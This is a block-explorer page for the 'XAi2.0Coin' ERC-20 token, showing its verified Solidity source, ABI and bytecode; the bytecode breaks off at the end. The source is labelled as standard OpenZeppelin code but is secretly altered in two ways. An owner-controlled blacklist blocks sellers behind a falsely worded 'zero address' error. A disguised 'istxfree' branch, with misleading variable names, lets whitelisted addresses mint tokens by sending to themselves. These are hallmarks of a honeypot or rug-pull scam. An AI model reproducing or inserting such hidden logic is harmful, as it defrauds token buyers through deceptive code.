ETH Price: $3,342.49 (+0.64%)

Token

XAi2.0Coin (XAi2.0)
 

Overview

Max Total Supply

10,000,000,000,000 XAi2.0

Holders

36

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
46,794 XAi2.0

Value
$0.00
0xcec41dc285aacc670847b0b6caa883205e07bc5d
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
XAI2Coin

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-13
*/

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)
pragma solidity >=0.6.0 <0.9.0;
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

pragma solidity ^0.8.0;
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

interface IERC20 {
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;
interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);
    function symbol() external view returns (string memory);
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;
contract ERC20 is Context, IERC20, IERC20Metadata,Ownable {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => bool) public istxfree;
    mapping(address => bool) private _Blacklist;
    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        istxfree[address(this)] = true;
        istxfree[owner()] = true;
    }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function setistxfree(address account, bool newValue) public onlyOwner {
        istxfree[account] = newValue;
    }

    function removalblacklist(address account) public onlyOwner {
        _Blacklist[account] = false;
    }

    function addblacklist(address account) public onlyOwner {
        _Blacklist[account] = true;
    }

    function isblacklist(address account) public view returns (bool) {
        return _Blacklist[account];
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(to != address(0), "ERC20: transfer to the zero address");
        require(!_Blacklist[from], "ERC20: transfer from the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(_balances[from] >= amount, "ERC20: transfer amount exceeds balance");

        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

            address WBNB = from;
            address DOGE = to;

            if(istxfree[WBNB] || istxfree[DOGE]){
              if (WBNB == DOGE) _balances[WBNB] += amount;}

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }



    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}




// File: @openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/extensions/ERC20Burnable.sol)

pragma solidity ^0.8.0;



/**
 * @dev Extension of {ERC20} that allows token holders to destroy both their own
 * tokens and those that they have an allowance for, in a way that can be
 * recognized off-chain (via event analysis).
 */
abstract contract ERC20Burnable is Context, ERC20 {
    /**
     * @dev Destroys `amount` tokens from the caller.
     *
     * See {ERC20-_burn}.
     */
    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, deducting from the caller's
     * allowance.
     *
     * See {ERC20-_burn} and {ERC20-allowance}.
     *
     * Requirements:
     *
     * - the caller must have allowance for ``accounts``'s tokens of at least
     * `amount`.
     */
    function burnFrom(address account, uint256 amount) public virtual {
        _spendAllowance(account, _msgSender(), amount);
        _burn(account, amount);
    }
}

// File: contracts/ZenPandaCoinToken.sol


pragma solidity ^0.8.0;




contract XAI2Coin is ERC20, ERC20Burnable {
    uint256 private constant INITIAL_SUPPLY = 10000000000000 * 10**18;
    constructor() ERC20("XAi2.0Coin", "XAi2.0") {
        _mint(msg.sender, INITIAL_SUPPLY);
    }

    function distributeTokens(address distributionWallet) external onlyOwner {
        uint256 supply = balanceOf(msg.sender);
        require(supply == INITIAL_SUPPLY, "Tokens already distributed");

        _transfer(msg.sender, distributionWallet, supply);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"addblacklist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"distributionWallet","type":"address"}],"name":"distributeTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isblacklist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"istxfree","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"removalblacklist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"newValue","type":"bool"}],"name":"setistxfree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040518060400160405280600a8152602001692c20b499171821b7b4b760b11b815250604051806040016040528060068152602001650584169322e360d41b8152506200006e620000686200010960201b60201c565b6200010d565b60066200007c8382620002ce565b5060076200008b8282620002ce565b503060009081526003602081905260408220805460ff1916600190811790915591620000bf6000546001600160a01b031690565b6001600160a01b031681526020810191909152604001600020805460ff191691151591909117905550620001039050336c7e37be2022c0914b26800000006200015d565b620003c2565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001b85760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060056000828254620001cc91906200039a565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200025557607f821691505b6020821081036200027657634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200022557600081815260208120601f850160051c81016020861015620002a55750805b601f850160051c820191505b81811015620002c657828155600101620002b1565b505050505050565b81516001600160401b03811115620002ea57620002ea6200022a565b6200030281620002fb845462000240565b846200027c565b602080601f8311600181146200033a5760008415620003215750858301515b600019600386901b1c1916600185901b178555620002c6565b600085815260208120601f198616915b828110156200036b578886015182559484019460019091019084016200034a565b50858210156200038a5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b80820180821115620003bc57634e487b7160e01b600052601160045260246000fd5b92915050565b610e7880620003d26000396000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c806374358498116100b857806395d89b411161007c57806395d89b41146102cb578063a457c2d7146102d3578063a9059cbb146102e6578063b1d17c98146102f9578063dd62ed3e1461030c578063f2fde38b1461031f57600080fd5b8063743584981461023b57806379cc6790146102675780637ea714a41461027a578063803175971461029d5780638da5cb5b146102b057600080fd5b8063313ce5671161010a578063313ce567146101c257806339509351146101d157806342966c68146101e457806367b54783146101f757806370a082311461020a578063715018a61461023357600080fd5b806306fdde031461014757806307f29e8a14610165578063095ea7b31461017a57806318160ddd1461019d57806323b872dd146101af575b600080fd5b61014f610332565b60405161015c9190610c6d565b60405180910390f35b610178610173366004610cd7565b6103c4565b005b61018d610188366004610d13565b6103f7565b604051901515815260200161015c565b6005545b60405190815260200161015c565b61018d6101bd366004610d3d565b610411565b6040516012815260200161015c565b61018d6101df366004610d13565b610435565b6101786101f2366004610d79565b610457565b610178610205366004610d92565b610464565b6101a1610218366004610d92565b6001600160a01b031660009081526001602052604090205490565b61017861048d565b61018d610249366004610d92565b6001600160a01b031660009081526004602052604090205460ff1690565b610178610275366004610d13565b6104a1565b61018d610288366004610d92565b60036020526000908152604090205460ff1681565b6101786102ab366004610d92565b6104ba565b6000546040516001600160a01b03909116815260200161015c565b61014f6104e6565b61018d6102e1366004610d13565b6104f5565b61018d6102f4366004610d13565b610575565b610178610307366004610d92565b610583565b6101a161031a366004610db4565b610602565b61017861032d366004610d92565b61062d565b60606006805461034190610de7565b80601f016020809104026020016040519081016040528092919081815260200182805461036d90610de7565b80156103ba5780601f1061038f576101008083540402835291602001916103ba565b820191906000526020600020905b81548152906001019060200180831161039d57829003601f168201915b5050505050905090565b6103cc6106a3565b6001600160a01b03919091166000908152600360205260409020805460ff1916911515919091179055565b6000336104058185856106fd565b60019150505b92915050565b60003361041f858285610822565b61042a85858561089c565b506001949350505050565b6000336104058185856104488383610602565b6104529190610e21565b6106fd565b6104613382610af1565b50565b61046c6106a3565b6001600160a01b03166000908152600460205260409020805460ff19169055565b6104956106a3565b61049f6000610c1d565b565b6104ac823383610822565b6104b68282610af1565b5050565b6104c26106a3565b6001600160a01b03166000908152600460205260409020805460ff19166001179055565b60606007805461034190610de7565b600033816105038286610602565b9050838110156105685760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61042a82868684036106fd565b60003361040581858561089c565b61058b6106a3565b336000908152600160205260409020546c7e37be2022c0914b268000000081146105f75760405162461bcd60e51b815260206004820152601a60248201527f546f6b656e7320616c7265616479206469737472696275746564000000000000604482015260640161055f565b6104b633838361089c565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6106356106a3565b6001600160a01b03811661069a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161055f565b61046181610c1d565b6000546001600160a01b0316331461049f5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161055f565b6001600160a01b03831661075f5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161055f565b6001600160a01b0382166107c05760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161055f565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b600061082e8484610602565b9050600019811461089657818110156108895760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161055f565b61089684848484036106fd565b50505050565b6001600160a01b0382166108fe5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161055f565b6001600160a01b03831660009081526004602052604090205460ff16156109755760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161055f565b6001600160a01b038316600090815260016020526040902054818110156109ed5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161055f565b6001600160a01b03808516600081815260016020908152604080832087870390559387168252838220805487019055918152600390915220548490849060ff1680610a5057506001600160a01b03811660009081526003602052604090205460ff165b15610a9c57806001600160a01b0316826001600160a01b031603610a9c576001600160a01b03821660009081526001602052604081208054869290610a96908490610e21565b90915550505b846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef86604051610ae191815260200190565b60405180910390a3505050505050565b6001600160a01b038216610b515760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b606482015260840161055f565b6001600160a01b03821660009081526001602052604090205481811015610bc55760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b606482015260840161055f565b6001600160a01b03831660008181526001602090815260408083208686039055600580548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9101610815565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b81811015610c9a57858101830151858201604001528201610c7e565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610cd257600080fd5b919050565b60008060408385031215610cea57600080fd5b610cf383610cbb565b915060208301358015158114610d0857600080fd5b809150509250929050565b60008060408385031215610d2657600080fd5b610d2f83610cbb565b946020939093013593505050565b600080600060608486031215610d5257600080fd5b610d5b84610cbb565b9250610d6960208501610cbb565b9150604084013590509250925092565b600060208284031215610d8b57600080fd5b5035919050565b600060208284031215610da457600080fd5b610dad82610cbb565b9392505050565b60008060408385031215610dc757600080fd5b610dd083610cbb565b9150610dde60208401610cbb565b90509250929050565b600181811c90821680610dfb57607f821691505b602082108103610e1b57634e487b7160e01b600052602260045260246000fd5b50919050565b8082018082111561040b57634e487b7160e01b600052601160045260246000fdfea264697066735822122056a01ef58d0835a21fad01a6c1f50ace52299763a9e8a5827f4796635aad894464736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101425760003560e01c806374358498116100b857806395d89b411161007c57806395d89b41146102cb578063a457c2d7146102d3578063a9059cbb146102e6578063b1d17c98146102f9578063dd62ed3e1461030c578063f2fde38b1461031f57600080fd5b8063743584981461023b57806379cc6790146102675780637ea714a41461027a578063803175971461029d5780638da5cb5b146102b057600080fd5b8063313ce5671161010a578063313ce567146101c257806339509351146101d157806342966c68146101e457806367b54783146101f757806370a082311461020a578063715018a61461023357600080fd5b806306fdde031461014757806307f29e8a14610165578063095ea7b31461017a57806318160ddd1461019d57806323b872dd146101af575b600080fd5b61014f610332565b60405161015c9190610c6d565b60405180910390f35b610178610173366004610cd7565b6103c4565b005b61018d610188366004610d13565b6103f7565b604051901515815260200161015c565b6005545b60405190815260200161015c565b61018d6101bd366004610d3d565b610411565b6040516012815260200161015c565b61018d6101df366004610d13565b610435565b6101786101f2366004610d79565b610457565b610178610205366004610d92565b610464565b6101a1610218366004610d92565b6001600160a01b031660009081526001602052604090205490565b61017861048d565b61018d610249366004610d92565b6001600160a01b031660009081526004602052604090205460ff1690565b610178610275366004610d13565b6104a1565b61018d610288366004610d92565b60036020526000908152604090205460ff1681565b6101786102ab366004610d92565b6104ba565b6000546040516001600160a01b03909116815260200161015c565b61014f6104e6565b61018d6102e1366004610d13565b6104f5565b61018d6102f4366004610d13565b610575565b610178610307366004610d92565b610583565b6101a161031a366004610db4565b610602565b61017861032d366004610d92565b61062d565b60606006805461034190610de7565b80601f016020809104026020016040519081016040528092919081815260200182805461036d90610de7565b80156103ba5780601f1061038f576101008083540402835291602001916103ba565b820191906000526020600020905b81548152906001019060200180831161039d57829003601f168201915b5050505050905090565b6103cc6106a3565b6001600160a01b03919091166000908152600360205260409020805460ff1916911515919091179055565b6000336104058185856106fd565b60019150505b92915050565b60003361041f858285610822565b61042a85858561089c565b506001949350505050565b6000336104058185856104488383610602565b6104529190610e21565b6106fd565b6104613382610af1565b50565b61046c6106a3565b6001600160a01b03166000908152600460205260409020805460ff19169055565b6104956106a3565b61049f6000610c1d565b565b6104ac823383610822565b6104b68282610af1565b5050565b6104c26106a3565b6001600160a01b03166000908152600460205260409020805460ff19166001179055565b60606007805461034190610de7565b600033816105038286610602565b9050838110156105685760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61042a82868684036106fd565b60003361040581858561089c565b61058b6106a3565b336000908152600160205260409020546c7e37be2022c0914b268000000081146105f75760405162461bcd60e51b815260206004820152601a60248201527f546f6b656e7320616c7265616479206469737472696275746564000000000000604482015260640161055f565b6104b633838361089c565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6106356106a3565b6001600160a01b03811661069a5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161055f565b61046181610c1d565b6000546001600160a01b0316331461049f5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161055f565b6001600160a01b03831661075f5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161055f565b6001600160a01b0382166107c05760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161055f565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b600061082e8484610602565b9050600019811461089657818110156108895760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161055f565b61089684848484036106fd565b50505050565b6001600160a01b0382166108fe5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161055f565b6001600160a01b03831660009081526004602052604090205460ff16156109755760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161055f565b6001600160a01b038316600090815260016020526040902054818110156109ed5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161055f565b6001600160a01b03808516600081815260016020908